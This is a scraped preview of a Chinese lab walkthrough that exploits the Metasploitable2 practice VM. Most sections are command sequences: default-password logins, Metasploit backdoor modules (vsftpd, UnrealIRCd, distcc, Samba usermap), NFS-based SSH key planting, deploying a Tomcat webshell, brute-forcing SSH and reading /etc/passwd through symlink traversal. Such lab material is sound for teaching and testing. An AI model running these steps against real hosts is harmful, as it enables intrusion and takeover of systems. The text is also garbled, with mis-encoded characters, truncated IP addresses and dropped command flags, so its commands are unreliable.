Metasploitable2靶機(jī)漏洞-hanxu_第1頁
Metasploitable2靶機(jī)漏洞-hanxu_第2頁
Metasploitable2靶機(jī)漏洞-hanxu_第3頁
Metasploitable2靶機(jī)漏洞-hanxu_第4頁
Metasploitable2靶機(jī)漏洞-hanxu_第5頁
已閱讀5頁,還剩27頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

1、Metasploitable2靶機(jī)漏洞弱密碼漏洞(WEAK PASSWORD)2SAMBA MS-RPC SHELL命令注入漏洞6VSFTPD源碼包后門漏洞7UNREALIRCD后門漏洞9LINUX NFS共享目錄配置漏洞10JAVA RMI SERVER命令執(zhí)行漏洞13TOMCAT管理臺默認(rèn)口令漏洞15ROOT用戶弱口令漏洞(SSH爆破)18DISTCC后門漏洞21SAMBA SYSMLINK 默認(rèn)配置目錄遍歷漏洞22PHP CGI參數(shù)注入執(zhí)行漏洞25DRUBY 遠(yuǎn)程代碼執(zhí)行漏洞26INGRESLOCK后門漏洞29推薦精選弱密碼漏洞(Weak Password)安全組織索引CVE:OSVDB

2、:BID:原理系統(tǒng)或者數(shù)據(jù)庫的登錄用戶,密碼簡單或者和用戶名相同,容易通過暴力破解手段來獲取密碼。參考鏈接如下:影響系統(tǒng)/軟件所有使用用戶名/密碼登錄的系統(tǒng)/軟件都有可能存在此問題。在Metasploitable2中,系統(tǒng)口令、MySQL、PostgreSQL和VNC遠(yuǎn)程登錄都存在弱密碼漏洞使用工具Kali-linux利用步驟Ø 系統(tǒng)弱密碼登錄1. 在kali上執(zhí)行命令行telnet 51 232. login和password都輸入msfadmin3. 登錄成功,進(jìn)入系統(tǒng)推薦精選4.5. 相同的步驟,弱密碼還有user/user、postgres/postgres、s

3、ys/batman、klog/123456789、service/serviceØ MySQL弱密碼登錄1. 在kali上執(zhí)行mysql h 51 u root2. 登錄成功,進(jìn)入mysql系統(tǒng)3.Ø PostgreSQL弱密碼登錄1. 在kali上執(zhí)行psql h 51 U postgres2. 輸入密碼postgres3. 登錄成功,進(jìn)入postgresql系統(tǒng)推薦精選4.Ø VNC弱密碼登錄1. 在kali圖形界面的終端中執(zhí)行vncviewer 512. 輸入密碼password3. 登錄成功,進(jìn)入系統(tǒng)4.推薦精選5

4、.攻擊樣本推薦精選對應(yīng)規(guī)則友商防護(hù)能力Samba MS-RPC Shell命令注入漏洞安全組織索引CVE:CVE-2007-2447BID:BID-23972OSVDB:OSVDB-34700原理Samba中負(fù)責(zé)在SAM數(shù)據(jù)庫更新用戶口令的代碼未經(jīng)過濾便將用戶輸入傳輸給了/bin/sh。如果在調(diào)用smb.conf中定義的外部腳本時,通過對/bin/sh的MS-RPC調(diào)用提交了惡意輸入的話,就可能允許攻擊者以nobody用戶的權(quán)限執(zhí)行任意命令。參考鏈接如下:/samba/security/CVE-2007-2447.html影響系統(tǒng)/軟件Xerox WorkCent

5、re ProXerox WorkCentreVMWare ESX ServerTurbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJITrustix Secure LinuxSUSE Linux EnterpriseSun SolarisSlackware LinuxRedHat EnterpriseMandriva LinuxMandrakeSoft Corporate ServerHP HP-UXGentoo LinuxDebian LinuxApple Mac OS X推薦精選使用工具Kali,Metasploit

6、利用步驟1. 在kali中執(zhí)行msfconsole,啟動metasploit2. use exploit/multi/samba/usermap_script,選擇漏洞3. set RHOST 51,設(shè)置要攻擊的機(jī)器IP4. exploit,開始攻擊5. 利用成功,執(zhí)行uname a驗證6.攻擊樣本對應(yīng)規(guī)則友商防護(hù)能力Vsftpd源碼包后門漏洞安全組織索引CVE:BID:BID-48539推薦精選OSVDB:OSVDB-73573原理在特定版本的vsftpd服務(wù)器程序中,被人惡意植入代碼,當(dāng)用戶名以“:)”為結(jié)尾,服務(wù)器就會在6200端口監(jiān)聽,并且能夠執(zhí)行任意代碼。參考鏈接如下:

7、影響系統(tǒng)/軟件Vsftpd server v2.3.4使用工具Kali,Metasploit利用步驟1. 在kali中執(zhí)行msfconsole,啟動metasploit2. use exploit/unix/ftp/vsftpd_234_backdoor,選擇漏洞3. set RHOST 51,設(shè)置要攻擊的機(jī)器IP4. exploit,開始攻擊5. 利用成功,執(zhí)行uname a驗證6.攻擊樣本推薦精選對應(yīng)規(guī)則友商防護(hù)能力UnrealIRCd后門漏洞安全組織索引CVE:CVE-2010-2075BID:BID-40820OSVDB:OSVDB-65445原理在2009年11月到20

8、10年6月間分布于某些鏡面站點的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的惡意代碼,遠(yuǎn)程攻擊者能夠執(zhí)行任意代碼。參考鏈接如下:影響系統(tǒng)/軟件Unreal UnrealIRCd 使用工具Kali,Metasploit利用步驟1. 在kali中執(zhí)行msfconsole,啟動metasploit2. use exploit/unix/irc/unreal_ircd_3281_backdoor,選擇漏洞3. set RHOST 51,設(shè)置要攻擊的機(jī)器IP4. exploit,開始攻擊5. 利用成功,執(zhí)行uname a驗證推薦精選6.攻擊

9、樣本對應(yīng)規(guī)則友商防護(hù)能力Linux NFS共享目錄配置漏洞安全組織索引CVE:無OSVDB:無BID:無原理NFS 服務(wù)配置漏洞,賦予了根目錄遠(yuǎn)程可寫權(quán)限,導(dǎo)致/root/.ssh/ authorized_keys可被修改,實現(xiàn)遠(yuǎn)程ssh無密碼登陸。影響系統(tǒng)/軟件所有Linux系統(tǒng)的NFS服務(wù)推薦精選使用工具Kali-linux利用步驟1. 在kali上執(zhí)行命令行rpcinfo p 51,查看nfs服務(wù)有無開啟:2. 用showmount -e 51查看其設(shè)置的遠(yuǎn)程共享目錄列表:3. 輸入ssh-keygen生成rsa公鑰:推薦精選4. 依次輸入l mount t

10、nfs 51:/ /tmp/t00l(預(yù)先創(chuàng)建),把51的根目錄掛載到/tmp/t00l/下;注:如果提示下圖中錯誤則需要/etc/init.d/rpcbind start來啟動mountl cat /root/.ssh/id_rsa.pub >> /tmp/t00l/root/.ssh/authorized_keys,把生成的公鑰追加到靶機(jī)的authorized_keys下;l ssh root51,實現(xiàn)無密碼登陸推薦精選攻擊樣本無對應(yīng)規(guī)則友商防護(hù)能力Java RMI SERVER命令執(zhí)行漏洞安全組織索引CVE:無OSVDB:17535B

11、ID:無原理Java RMI Server的RMI注冊表和RMI激活服務(wù)的默認(rèn)配置存在安全漏洞,可被利用導(dǎo)致代碼執(zhí)行影響系統(tǒng)/軟件Oracle Java RMI Server使用工具M(jìn)etasploit利用步驟1. Nmap p0-65535 51來查看1099端口是否開啟推薦精選2. 依次輸入以下命令:l use exploit/multi/misc/java_rmi_serverl set RHOST 51(靶機(jī)IP)l exploitl shell(進(jìn)入meterpreter時執(zhí)行)推薦精選然后即可獲得shell了攻擊樣本對應(yīng)規(guī)則友商防護(hù)能力Tomcat管理臺

12、默認(rèn)口令漏洞安全組織索引CVE:無OSVDB:無BID:無推薦精選原理Tomcat 管理臺安裝好后需要及時修改默認(rèn)管理賬戶,并杜絕弱口令,成功登陸者可以部署任意web應(yīng)用,包括webshell.影響系統(tǒng)/軟件Tomcat使用工具NessusJSPwebshell利用步驟1. 訪問51:8081,點擊tomcat manager,輸入tomcat/tomcat,即可進(jìn)入管理臺2. 在自己機(jī)器上準(zhǔn)備好JSP webshell(liuz.jsp),通過jar cvf 來打包成liuz.war3. 通過tomcat管理臺deploy剛才打包的liuz.war推薦精選4. 打包成功可以看到

13、應(yīng)用目錄生成(/liuz)5. 訪問51/liuz/liuz.jsp得到webshell推薦精選攻擊樣本對應(yīng)規(guī)則友商防護(hù)能力Root用戶弱口令漏洞(SSH爆破)安全組織索引CVE:無OSVDB:無BID:無原理靶機(jī)root用戶存在弱口令漏洞,在使用指南里并沒有指出。.推薦精選影響系統(tǒng)/軟件Linux使用工具metasploit利用步驟1. 輸入nmap sV O 51,查看SSH端口是否開啟:2. 打開metasploit framework依次輸入:use auxiliary/scanner/ssh/ssh_loginset RHOSTS 51set

14、 USERNAME rootset PASS_FILE /tmp/r00t/pass.txt(字典文件,需要預(yù)先生成)set THREADS 50run推薦精選 root口令爆破成功 ,口令為root3. ssh root51 成功登陸:攻擊樣本推薦精選對應(yīng)規(guī)則友商防護(hù)能力Distcc后門漏洞安全組織索引CVE:CVE-2004-2687BID:OSVDB:OSVDB-13378原理Distcc用于大量代碼在網(wǎng)絡(luò)服務(wù)器上的分布式編譯,但是如果配置不嚴(yán)格,容易被濫用執(zhí)行命令,該漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置對于服務(wù)器端口的訪問不限制。參考鏈接如

15、下:/cgi-bin/cvename.cgi?name=2004-2687影響系統(tǒng)/軟件distcc 2.x使用工具Kali,Metasploit利用步驟1. 在kali中執(zhí)行msfconsole,啟動metasploit2. msf > use exploit/unix/misc/distcc_exec,選擇漏洞3. set RHOST 51,設(shè)置要攻擊的機(jī)器IP4. exploit,開始攻擊5. 利用成功,執(zhí)行id查看權(quán)限,uname a驗證服務(wù)器信息推薦精選6.攻擊樣本對應(yīng)規(guī)則友商防護(hù)能力Samba sysmlink 默認(rèn)配置目錄

16、遍歷漏洞安全組織索引CVE:CVE- 2010-0926BID:33598OSVDB:OSVDB-62145推薦精選原理Samba是一套實現(xiàn)SMB(server messages block)協(xié)議,跨平臺進(jìn)行文件共享和打印共享服務(wù)的程序,samba的sambd默認(rèn)配置在可寫文件共享時,存在目錄遍歷漏洞,遠(yuǎn)程用戶可以通過smbclient端使用一個對稱命,創(chuàng)建一個包含.的目錄遍歷符的軟連接 ,可以進(jìn)行目錄遍歷以及訪問任意文件。參考鏈接如下:影響系統(tǒng)/軟件before 3.3.11, 3.4.x before 3.4.6, and 3.5.x before 3.5.0rc3使用工具Kali,Met

17、asploit利用步驟1. 在kali中執(zhí)行msfconsole,啟動metasploit2. use auxiliary/admin/smb/samba_symlink_traversal,選擇漏洞3. set RHOST 51,設(shè)置要攻擊的機(jī)器IP4. msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp 設(shè)置SAM可寫文件5. exploit,開始攻擊6. rootyd0str:# smbclient /51/tmp 在新窗口下執(zhí)行smbclient命令打開上面生成的共享目錄7. smb: &

18、gt; cd rootfs 進(jìn)入rootfs目錄8. smb: rootfs> ls 執(zhí)行l(wèi)s命令列出目錄,9. smb: rootfs> more /etc/passwd 列出密碼文件,利用成功推薦精選10.11.攻擊樣本推薦精選對應(yīng)規(guī)則友商防護(hù)能力PHP CGI參數(shù)注入執(zhí)行漏洞安全組織索引CVE:CVE- 2012-1823BID:OSVDB:OSVDB-81633原理CGI腳本沒有正確處理請求參數(shù),導(dǎo)致源代碼泄露,允許遠(yuǎn)程攻擊者在請求參數(shù)中插入執(zhí)行命令。參考鏈接如下: /81633 /93979 ht

19、tp:/www.exploit- 影響系統(tǒng)/軟件before 5.3.12 and 5.4.x before 5.4.2使用工具Kali,Metasploit利用步驟1. 在kali中執(zhí)行msfconsole,啟動metasploit2. msf > use exploit/multi/http/php_cgi_arg_injection,選擇漏洞3. set RHOST 51,設(shè)置要攻擊的機(jī)器IP推薦精選4. exploit,開始攻擊5. meterpreter > ls 獲得meterpreter,可執(zhí)行l(wèi)s列出目錄確認(rèn)承認(rèn)6.攻擊樣本對應(yīng)規(guī)則友商防護(hù)能力Drub

20、y 遠(yuǎn)程代碼執(zhí)行漏洞安全組織索引CVE:CVE- 2013-0156(類似)BID:OSVDB:推薦精選原理Druby配置不當(dāng),被濫用執(zhí)行命令(Distributed Ruby or DRb allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method invocation (RMI) to pass commands and data between processes)參考鏈接如下:/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html影響系統(tǒng)/軟件Ruby 1.8使用工具Kali,Metasploit利用步驟1. rootyd0str:# nmap -p0-65535 -sS -sV 51,NMAP掃描端口及端口應(yīng)用(或者amap -bqv 51 8787)2. 在kali中執(zhí)行msfconsole,啟動metasploit3. 發(fā)現(xiàn)8787druby端口4. msf > search drb 搜索dbr相關(guān)漏洞5. msf > use exploit/linux/mis

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

最新文檔

評論

0/150

提交評論